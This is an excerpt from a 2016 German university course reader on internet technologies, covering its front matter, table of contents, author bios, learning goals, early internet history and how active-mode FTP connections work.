Zertifikatsprogramm - Z-206

Internettechnologien Netzwerktechnik Das Internet Internetdienste World Wide Web Web Applications Security

Prof. Dr. Martin Rieger Benjamin Welte, M.Eng.Tobias Scheible, M.Eng.

Modul Z-206

Internettechnologien

Studienbrief 1: Netzwerktechnik

Studienbrief 2: Das Internet

Studienbrief 3: Internetdienste

Studienbrief 4: World Wide Web

Studienbrief 5: Web Applications Security

Autoren:

Prof. Dr. Martin Rieger

Dipl.-Ing. (FH) Tobias Scheible

Benjamin Welte, B.Eng.

Christian Schneider, B.Eng.

2. Auflage

Hochschule Albstadt-Sigmaringen

© 2016 Hochschule Albstadt-SigmaringenInstitut für Wissenschaftliche WeiterbildungOpen C3S-ZertifikatsprogrammSteinachstraße 1172336 Balingen

2. Auflage (2016-11-05)

Das Werk einschließlich seiner Teile ist urheberrechtlich geschützt. Jede Ver-wendung außerhalb der engen Grenzen des Urheberrechtsgesetzes ist ohneZustimmung der Verfasser unzulässig und strafbar. Das gilt insbesonderefür Vervielfältigungen, Übersetzungen, Mikroverfilmungen und die Einspei-cherung und Verarbeitung in elektronischen Systemen.

Um die Lesbarkeit zu vereinfachen, wird auf die zusätzliche Formulierungder weiblichen Form bei Personenbezeichnungen verzichtet. Wir weisen des-halb darauf hin, dass die Verwendung der männlichen Form explizit alsgeschlechtsunabhängig verstanden werden soll.

Das diesem Bericht zugrundeliegende Vorhaben wurde mit Mitteln des Bun-desministeriums für Bildung, und Forschung unter dem Förderkennzeichen16OH11066 gefördert. Die Verantwortung für den Inhalt dieser Veröffentli-chung liegt beim Autor.

Inhaltsverzeichnis Seite 3

Inhaltsverzeichnis

Einleitung zu den Studienbriefen 6I. Abkürzungen der Randsymbole und Farbkodierungen . . . . . . . . . . . . . . . . . . . . . . . 6II. Zu den Autoren . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7III. Modullehrziele . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

Studienbrief 1 Netzwerktechnik 111.1 Lernergebnisse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 111.2 Advance Organizer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 111.3 Einleitung . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11

1.3.1 Internet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 111.3.2 Sicherheit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 121.3.3 Begrifflichkeiten . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13

1.4 Netzwerke . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 151.4.1 Topologien . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 151.4.2 Kommunikationsarten . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 181.4.3 Struktur . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 181.4.4 Komponenten . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 201.4.5 Infrastruktur . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 231.4.6 Endgeräte . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26

1.5 Schichtenmodelle . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 281.5.1 ISO/OSI-7-Schichtenmodell . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291.5.2 TCP/IP-Schichtenmodell . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30

1.6 Routing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 391.6.1 Domain Name System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 391.6.2 Ports . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 401.6.3 Firewall . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 411.6.4 Tunneling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 421.6.5 Proxy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 421.6.6 Virtual Private Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43

1.7 Zusammenfassung . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 431.8 Übungen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44

Studienbrief 2 Das Internet 572.1 Lernergebnisse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 572.2 Advance Organizer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 572.3 Geschichte . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57

2.3.1 Vorläufer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 572.3.2 Dienste . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 592.3.3 Internet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59

2.4 Kernprinzipien . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 612.5 Organisationen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62

2.5.1 Internet Society . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 632.5.2 Internet Architecture Board . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 632.5.3 Internet Engineering Task Force . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 642.5.4 Internet Engineering Steering Group . . . . . . . . . . . . . . . . . . . . . . . . . . . . 642.5.5 Internet Research Task Force . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 642.5.6 Internet Research Steering Group . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 642.5.7 Internet Corporation for Assigned Names and Numbers . . . . . . . . . . . . . . . . . . 642.5.8 Internet Assigned Numbers Authority . . . . . . . . . . . . . . . . . . . . . . . . . . . 652.5.9 Regional Internet Registry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 652.5.10 World Wide Web Consortium . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 652.5.11 Web Hypertext Application Technology Working Group . . . . . . . . . . . . . . . . . . 66

Seite 4 Inhaltsverzeichnis

2.6 Entwicklungen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 662.6.1 Cloud Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 662.6.2 Internet der Dinge . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 712.6.3 Big Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75

2.7 Zusammenfassung . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 762.8 Übungen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76

Studienbrief 3 Internetdienste 793.1 Lernergebnisse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 793.2 Advance Organizer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 793.3 Datenaustausch . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79

3.3.1 File Transfer Protocol . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 793.3.2 Peer-to-Peer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83

3.4 Fernzugriff . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 843.4.1 Telnet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 843.4.2 Secure Shell . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85

3.5 E-Mail . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 863.5.1 Überblick . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 863.5.2 Simple Mail Transfer Protocol . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 933.5.3 Post Office Protocol . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 953.5.4 Internet Message Access Protocol . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 963.5.5 Sicherheit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 973.5.6 Push E-Mail . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99

3.6 Kommunikation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 993.6.1 Chat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 993.6.2 Instant Messaging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1013.6.3 Internettelefonie . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104

3.7 Zusammenfassung . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1073.8 Übungen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107

Studienbrief 4 World Wide Web 1094.1 Lernergebnisse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1094.2 Advance Organizer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1094.3 Technik . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109

4.3.1 Hypertext Transfer Protocol . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1094.3.2 HTTP-Kommunikation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1104.3.3 HTTP-Request-Methoden . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1114.3.4 Cookies und Sessions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1124.3.5 Verschlüsselungsmechanismen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1144.3.6 HTTP/2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 115

4.4 Website . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1174.4.1 Hypertext Markup Language . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1174.4.2 Cascading Style Sheets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1224.4.3 JavaScript . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124

4.5 Webbrowser . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1274.5.1 Adobe Flash . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1274.5.2 Java-Applets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128

4.6 Webserver . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1294.6.1 Dynamische Dokumente . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 130

4.7 Zusammenfassung . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1394.8 Übungen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139

Studienbrief 5 Web Applications Security 1435.1 Lernergebnisse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1435.2 Advance Organizer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1435.3 Webbasierte Anwendungen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 143

5.3.1 Funktionsweise . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1435.3.2 Architektur . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 145

Inhaltsverzeichnis Seite 5

5.4 Angriffsvektoren . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1485.4.1 Grundlagen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1485.4.2 Angriffe auf Client-Ebene . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1545.4.3 Angriffe auf Netzwerk-Ebene . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1625.4.4 Angriffe auf Server-Ebene . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 163

5.5 Zusammenfassung . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1695.6 Übungen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169

Liste der Lösungen zu den Kontrollaufgaben 173

Verzeichnisse 189I. Abbildungen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189II. Beispiele . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 190III. Definitionen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191IV. Exkurse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191V. Kontrollaufgaben . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191VI. Tabellen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192VII. Literatur . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192

Seite 6 Einleitung zu den Studienbriefen

Einleitung zu den Studienbriefen

I. Abkürzungen der Randsymbole und Farbkodierungen

Beispiel B

Definition D

Exkurs E

Kontrollaufgabe K

Quelltext Q

Übung Ü

Zu den Autoren Seite 7

II. Zu den Autoren

Prof. Dr. Martin Rieger studierte Elektro- und Informationstechnik an derTechnischen Universität München und schloss an derselben Hochschule diePromotion mit Auszeichnung ab. Ein Schwerpunkt seiner Forschungsarbeit lag inder Erstellung von Methoden und Werkzeugen zur Modellierung sowie Analyseund Optimierung elektrischer Schaltungen. Er war fünf Jahre Leiter des Laborsfür schnelle Analog-ICs in der IC-Entwicklungsabteilung des Forschungs- undEntwicklungszentrums der Firma Thomson Multimedia in Villingen. In der Zeitbei Thomson Multimedia war er Erfinder bzw. Miterfinder an 15 deutschen, 12europäischen und 8 weltweiten Patenten.

Seit 1993 ist er als Professor an der Fakultät Engineering der HochschuleAlbstadt-Sigmaringen auf den Gebieten Informatik und Informationstechnik tätig.Im Labor für Eingebettete Systeme und IT-Sicherheit betreibt er anwendungsnaheForschung auf den Gebieten Embedded Systems und IT-Sicherheit. Er ist Mitgliedder Gesellschaften/Organisationen VDI (Verein Deutscher Ingenieure), VDE(Verband der Elektrotechnik Elektronik Informationstechnik), GI (Gesellschaft fürInformatik) sowie des IEEE (Institute of Electrical and Electronics Engineers).

Prof. Dr. Rieger ist Initiator des Studiengangs Digitale Forensik und seit2009 Studiendekan. Außerdem leitet er das Zertifikatsprogramm in dem Verbund-projekt Open C3S.

Tobias Scheible, Dipl.-Ing. (FH), studierte Kommunikations- und Softwaretechnikan der Hochschule Albstadt-Sigmaringen und schloss sein Studium 2009 in derFachrichtung Kommunikationstechnik ab. In seiner Diplomarbeit beschäftigteer sich mit der Erhebung von spezifischen Anforderungen an asynchrone WebApplications.

Tobias Scheible begann seine berufliche Laufbahn in der Werbebranche,wobei er für die Konzeption und Entwicklung vonWeb Applications undWebsiteszuständig war. Des Weiteren veröffentlichte er Artikel zu den Themen CloudComputing, IPv6 und HTML5 in den Fachzeitschriften Screenguide, Hakin9und imWebstandards-Magazin. Außerdem bloggt er unter scheible.it über WebDevelopment und Cybersecurity-Themen.

Seit 2012 ist er als akademischer Mitarbeiter an der Hochschule Albstadt-Sigmaringen am Institut für Wissenschaftliche Weiterbildung tätig. Dort arbeiteter als Modulentwickler im Verbundprojekt Open Competence Center for CyberSecurity.

Benjamin Welte absolvierte den Bachelor-Studiengang Kommunikations- und Soft-waretechnik an der Hochschule Albstadt-Sigmaringen.Während des Bachelors arbeitete er als Werkstudent im Bereich der Softwareent-wicklung.Seit Februar 2016 arbeitet er als Modulentwickler und Tutor im Zertifikatspro-gramm des Open Competence Center for Cyber Security.

Seite 8 Einleitung zu den Studienbriefen

Christian Schneider hat an der Hochschule Albstadt-Sigmaringen Technische Infor-matik studiert. Während seines Bachelorstudiums arbeitete er für einen Antiviren-hersteller und als Webentwickler. Weiter betreute er, im Rahmen von Vorlesungen,Studenten als Tutor.Seit Februar 2016 unterstützt er als wissenschaftlicher Mitarbeiter das Institut fürwissenschaftliche Weiterbildung bei der Erstellung von Studienbriefen.

Modullehrziele Seite 9

III. Modullehrziele

Die Lehrveranstaltung „Internettechnologien“ gibt einen Überblick über die technischen Grundlagen desInternets und die Funktionsweise unterschiedlicher Internetdienste. Dem Lernenden werden dabei dieFunktionsweise der am weitesten verbreiteten Protokolle und Techniken vermittelt. Anschließend wird dieSicherheit von Web Applications näher betrachtet.

Im ersten Studienbrief „Netzwerktechnik“ werden die wichtigsten Grundlagen der Netzwerktechnik mitFokus auf die Internettechnologien behandelt. Dabei werden die gängigsten Prinzipien der Vernetzungvorgestellt und die dafür notwendigen Techniken beschrieben. Des Weiteren werden die Protokolle näherbetrachtet, um ein tieferes Verständnis für die Netzwerktechnik zu schaffen.

Im zweiten Studienbrief „Das Internet“ wird die Geschichte des Internets näher beleuchtet, um so ein tieferesVerständnis für die Wirkungsweise einzelner Techniken zu bekommen. Des Weiteren werden der Aufbauund die Strukturierung des heutigen Internets näher betrachtet und welche Möglichkeiten zur Verfügungstehen, um sich mit dem Internet zu verbinden.

Im dritten Studienbrief „Internetdienste“ werden die gängigsten Internetdienste und ihre Funktionen vor-gestellt. Dabei werden besonders die Dienste für die E-Mail-Kommunikation und der Dateiübertragungbetrachtet.

Im vierten Studienbrief „World Wide Web“ werden die gängigsten Techniken vorgestellt, die bei einerWebsite zur Anwendung kommen. Dabei werden die Übertragungsprotokolle, der Aufbau von Websites,die Funktionsweisen von Webbrowsern, die verschiedenen Arten des Webhostings und die Techniken vonWebservern näher erläutert.

Im letzten Studienbrief „Web Applications Security“ werden Angriffsvektoren auf Web Applications erklärt.Anhand von einer Demo-Plattform werden diese praxisnah demonstriert.

Nach erfolgreichem Abschluss des Moduls hat der Studierende Kenntnisse über die grundlegenden Struktu-ren und möglichen Transportwege der Informationen im Internet. Der Teilnehmer kennt die für den Betriebdes Internets erforderliche Hard- und Software und kann deren Bedeutung für die IT-Sicherheit beurtei-len. Er kann die aus dem Informationsfluss resultierenden digitalen Spuren bewerten und Analyseansätzeableiten sowie Eigenschaften wichtiger Dienste nachvollziehen und diese einsetzen. Außerdem kann derTeilnehmer Abwehrmaßnahmen für Web Applications entwickeln, da Angriffsvektoren selbst angewendetwerden können.

Studienbrief 1 Netzwerktechnik Seite 11

Studienbrief 1 Netzwerktechnik

1.1 Lernergebnisse

Sie können grundlegende Begriffe der Netzwerktechnik erklären und einordnen.Sie besitzen das Wissen um die einzelnen Schritte und Ebenen der Übertragungvon Informationen in Netzwerken wiedergeben. Darüber hinaus sind Sie in derLage, grundlegende Informationen von Netzwerkanschlüssen zu erheben und dieDomains von Websites zu analysieren.

1.2 Advance Organizer

Der Studienbrief „Netzwerktechnik“ bietet auch für Einsteiger und Neulinge indieser Thematik genügend Materialien in Form von Hinweisen, Übungen undBildern, um einen grundlegenden Wissensstand zu schaffen.

1.3 Einleitung

InternetKeine andere Technologie hat jemals zuvor eine so schnelle und große Verbreitungerlebt, so eine große Zahl von unterschiedlichen Bereichen beeinflusst und wird sohäufig wie das Internet genutzt. Diese Entwicklung hat ganze Sparten umgekrem-pelt oder sogar einzelne Bereiche komplett ersetzt. Doch die Entwicklung ist nochlange nicht abgeschlossen. Durch immer neue Strategien, wie Cloud Computingoder Big Data, ergeben sich immer neue Anwendungsszenarien.

1.3.1 Internet

EntwicklungDie Geschichte des Internets beginnt in einer Forschungsabteilung des Vertei-digungsministeriums der Vereinigten Staaten. Das Projekt lief anfänglich unterdem Namen Arpanet (Advanced Research Projects Agency Network), und hattezum Ziel, ein dezentrales Netzwerk zu entwickeln, das mehrere weit voneinanderentfernte Rechner an US-amerikanischen Universitäten miteinander verband. Dadas Arpanet nur auf ein bestimmtes Netz hin optimiert war, wurden diese Techni-ken so weiterentwickelt, dass verschiedene Netze miteinander verbunden werdenkonnten, woraus das heutige Internet entstand [Sorge et al., 2013, S. 8].

Begriff InternetDer Begriff Internet setzt sich aus den beiden abgekürzten englischen Begriffen„inter“ für „interconnected“ und „net“ für „network“ zusammen. Diese Begrifflich-keit bedeutet übersetzt ins Deutsche in etwa „miteinander verbundeneNetzwerke“.Damit ist das Internet eine Kommunikationsmethode, die weltweit Rechner mit-einander verbindet. Allerdings werden umgangssprachlich viele Techniken unterdem Begriff Internet zusammengefasst oder als Synonym verwendet. So wird derBegriff Internet sehr oft mit dem World Wide Web, also Websites im Web-Browser,gleichgesetzt. Dies ist aber nur ein Dienst, wie zum Beispiel auch die E-Mail, diedas Internet als Übertragmedium nutzt. Als Synonyme für das Internet wird auchder Begriff Cyberspace verwendet.

VerbreitungNeben den ursprünglichen Diensten, wie E-Mails und Websites, werden immermehr Daten aus den unterschiedlichen Bereichen über das Internet übertragen.So werden immer mehr Geräte entwickelt, die eine Funkverbindung aufbauenkönnen, und sich untereinander austauschen können. Hierzu zählen zum BeispielRauchmelder, die kontinuierlich die gemessenen Werte und den Batteriezustandübermitteln können oder Aquarien, welche die Temperatur über das Internetbereitstellen. Daher sind heutzutage nicht mehr nur „normale“ Rechner mit demInternet verbunden, sondern auch viele solcher versteckten Rechnern.

Studienbrief 2 Das Internet Seite 57

Studienbrief 2 Das Internet

2.1 Lernergebnisse

Sie können grundlegende Kernprinzipien des Internets erklären und einordnen.Sie sind in der Lage, grundlegende Organisationen der Internetverwaltung zubeschreiben. Sie können die einzelnen Bedeutungen von wichtigen Entwicklungenwiedergeben.

2.2 Advance Organizer

Der Studienbrief „Das Internet“ biete auch für Einsteiger und Neulinge in dieserThematik genügend Materialien in Form von Hinweisen, Übungen und Bildernum einen grundlegenden Wissensstand zu schaffen.

2.3 Geschichte

ARPADie Geschichte des Internets fängt mit dem Start in das Zeitalter der Raumfahrt an.Als die damalige Sowjetunion den ersten Satelliten Sputnik 1957 startete, demons-trierten sie damit ihre technische Überlegenheit gegenüber den USA. Die Wirkungauf die Amerikaner wird von den Historikern als „Sputnik-Schock“ beschrieben.Als eine von vielen Reaktionen darauf gründete die damalige Regierung 1958 dasARPA (Advanced Research Project Agency) mit demAuftrag, neuartige Technologi-en zu entwickeln; später wurde es in DARPA (Defense Advanced Research ProjectsAgency) umbenannt. An diesem Institut wurden dann die ersten Techniken fürdas Internet entwickelt.

2.3.1 Vorläufer

Man-Computer-SymbiosisDer Psychologie-Professor Joseph Carl Robnett Licklider beschrieb bereits 1960in seinem Artikel „Man-Computer-Symbiosis“ das Konzept einer einfacherenInteraktion zwischen Mensch und Computer. Zwei Jahre später beschrieb er ineiner Reihe von Memos eine frühe Vision des Internets, die er „Galactic Network“nannte. Diese Vision beinhaltete schon nahezu alle Ideen, die das heutige Internetkennzeichnen.

Paketvermittlung1962 wechselte Licklider zu ARPA und gründete dort das Information Proces-sing Techniques Office (IPTO). Dort entwickelte er die Idee weiter, dass mehrereMenschen über ein Netzwerk einen Großrechner gleichzeitig nutzen können. Wäh-renddessen entwickelte Paul Baran an der Rand Corporation das Grundprinzipeines jeden modernen Netzwerks, die Paketvermittlung. Bisher wurde für jedeVerbindung eine physikalische Leitung fest genutzt. Daher beschränkte sich dieAnzahl der Verbindungen auf die vorhandene Anzahl von Leitungen. Mit derPaketvermittlung war es möglich, mehrere Verbindungen über eine Leitung abzu-wickeln.

ARPANETMit diesen neuen Techniken schrieb die ARPA-Forschungsabteilung unter Lickliderdie verschiedenen Bestandteile des neuen Netzes aus. 1969 wurde das erste Netz-werkmit demNamenARPANET in Betrieb genommen und verband 4 Großrechnerin den USA miteinander. Das erste übertragene Wort lautete „Login“. Allerdingsstürzte der Computer schon beim dritten Buchstaben „g“ ab. Ein paar Stundenspäter klappte die Übertragung. Dabei wurden Geräte mit der Bezeichnung „Inter-face Message Processor“ (IMP), ein Vorläufer der heutigen Router, eingesetzt. Dienachfolgende Abbildung 2.1 zeigt die Ausdehnung des ARPANETs von 1969 bis1977. Die Abbildung 2.2 zeigt die Struktur-Knotenpunkte des ARPANETs im Jahr1977.

Studienbrief 3 Internetdienste Seite 79

Studienbrief 3 Internetdienste

3.1 Lernergebnisse

Sie können grundlegende Begriffe der Internetdienste erklären und einordnen.Sie sind in der Lage, grundlegende Begriffe wie FTP, Telnet, SSH, POP3, SMTP,IMAP sowie VoIP zu beschreiben. Sie sind imstande, den Verbindungsaufbau einerE-Mail-Kommunikation durchzuführen.

3.2 Advance Organizer

Für den Studienbrief „Internetdienste“ sind praktische Erfahrungen im Umgangmit dem Internet empfehlenswert. Dazu gehört die Verwendung von gängigenE-Mail und FTP-Programmen. Des Weiteren sind Kenntnisse über Netzwerktech-nik sehr empfehlenswert.Zum Modul Internettechnologien wird ein Mikromodul „Netzwerkverkehr-Aufzeichnung und -Analyse mit Wireshark“ angeboten.

3.3 Datenaustausch

FTP, SCP und P2PBei dem Begriff Datenaustausch handelt es sich um Übertragung von Daten zwi-schen Programmen, Computern oder Systemkomponenten. Für die Möglichkeitder Übertragung stehen entweder klassische Datenträger oder eine Netzwerktech-nik zur Verfügung. Als Übertragungsmedien dienen dabei austauschbare Daten-träger (Disketten, Wechselplatten, ZIP-Disketten, CD-ROM, DVD), Bus-System,Direktverbindung über Nullmodem bzw. Data Link, Netzwerk oder Datenfern-übertragung kurz DFÜ. Für den reibungslosen Datenaustausch sind geeigneteFunktionen zur Umwandlung der Daten in für das Zielprogramm, Zielsystem bzw.Zielkomponente geeignete Datenformate bzw. Darstellungsformate nötig. TypischeUmwandlungsfunktionen sind Funktionen wie Export, Import, Konvertierung,Kodierung, sowie die Übertragung von Daten über geeignete Datenaustauschfor-mate. In den nachfolgenden Abschnitten werden die Übertragungsverfahren FTPund P2P betrachtet, die im Internet eingesetzt werden.

3.3.1 File Transfer Protocol

FTPDas File Transfer Protocol (FTP) ist ein Protokoll zur Übertragung von Dateien inNetzwerken. Es wird benutzt, um Dateien vom Server zum Client (download),vom Client zum Server (upload) oder clientgesteuert zwischen zwei FTP-Servernzu übertragen. Außerdem können per FTP, Verzeichnisse angelegt und ausgelesensowie Verzeichnisse und Dateien umbenannt oder gelöscht werden und Rechtefür Verzeichnisse und Dateien gesetzt werden.

VerbindungDas FTP verwendet für die Steuerung und Datenübertragung jeweils separateVerbindungen: Eine FTP-Sitzung beginnt, indem vom Client zum Control Port desServers, TCP-Port 21, eine Verbindung aufgebaut wird. Über diese Verbindungwerden Befehle zum Server gesendet. Der Server antwortet auf jeden Befehl mit ei-nem Statuscode, oft mit einem angehängten, erklärenden Text. Die meisten Befehlesind allerdings erst nach einer erfolgreichen Authentifizierung zulässig.

SicherheitDie FTP-Spezifikation sieht bis auf die einfache Benutzer-Authentifizierung, dieKennung und Passwort unverschlüsselt zwischen Client und Server übermittelt,keinerlei Sicherheitsfunktionen vor. Sichere Varianten sind SFTP oder FTPS. Diesewerden später näher betrachtet.

Seite 80 Studienbrief 3 Internetdienste

Verbindungsarten

zwei Varianten Zum Senden und Empfangen von Dateien sowie zur Übertragung von Verzeich-nislisten (auf dem TCP-Port 20) wird pro Vorgang jeweils eine separate TCP-Verbindung verwendet. FTP kennt für den Aufbau solcher Verbindungen zweiModi:

Aktives FTP Beim aktiven FTP (auch „Active Mode“) öffnet der Client einen zufälligen Port undteilt dem Server diesen sowie die eigene IP-Adresse mit. Dies ist typischerweise einPort des Clients, der jenseits von 1023 liegt, kann aber auch ein anderer Server sein,der seinerseits in den Passive Mode geschaltet wurde, also auf eine Verbindungwartet. Die Datenübertragung auf der Server-Seite erfolgt dabei über den Port 20(Data). Die Kommunikation mit Befehlen erfolgt ausschließlich auf dem CommandPort 21 (Command). Man spricht auch von der Steuerung „Out of Band“. Somitbleibt es möglich, dass während der Datenübertragung die Partner noch immermiteinander kommunizieren können. Die nachfolgende Abbildung 3.1 zeigt dasSchema einer FTP-Verbindung mit folgendem Ablauf:

1. Client öffnet über Port A eine Verbindung zum Port 21 (Command) desServers und teilt den eigenen Data Port (Port B) mit.

2. Der Server bestätigt die Verbindung und sendet als Antwort ein „OK“.

3. Der Server öffnet über den Port 20 eine Verbindung zum Data Port (Port B)des Clients.

4. Der Client bestätigt ebenfalls die Verbindung und sendet als Antwort ein„OK“.

Abb. 3.1: Aktives FTP

FTP-ServerFTP-Client

Port BData

Port ACommand

Port 21Command

Port 20Data

„Port B“

„OK“

„DATA CHANNEL“

„OK“

